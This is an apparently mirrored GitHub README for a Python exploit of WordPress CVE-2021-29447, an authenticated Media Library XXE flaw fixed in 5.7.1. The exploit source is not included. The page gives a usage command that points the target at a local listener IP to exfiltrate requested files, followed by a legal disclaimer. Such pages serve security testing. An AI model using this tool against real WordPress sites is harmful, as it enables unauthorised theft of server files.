Giters

M3l0nPan / wordpress-cve-2021-29447

Exploit WordPress Media Library XML External Entity Injection (XXE) to exfiltrate files.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

cve-2021-29447exploitpythonwordpressxxexxe-injection

WordPress CVE-2021-29447 exploit

Exploit WordPress Media Library XML authenticated External Entity Injection (XXE) to exfiltrate files.

Patched in WordPress 5.7.1.

Required valid WordPress credentials to interact with Media Library.

Usage

python3 wordpress-cve-2021-29447.py -l http://LOCAL_IP:PORT -r http://WORDPRESS_URL -u USERNAME -p PASSWORD

Script will ask for file path and return requested file.

Credit

Inspired by David Utón (M3n0sD0n4ld) ExploitDB script.

Disclaimer

Usage of this for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

License

This script is released under the MIT License.

About

Exploit WordPress Media Library XML External Entity Injection (XXE) to exfiltrate files.

cve-2021-29447exploitpythonwordpressxxexxe-injection

License:MIT License

Languages

Language:Python 100.0%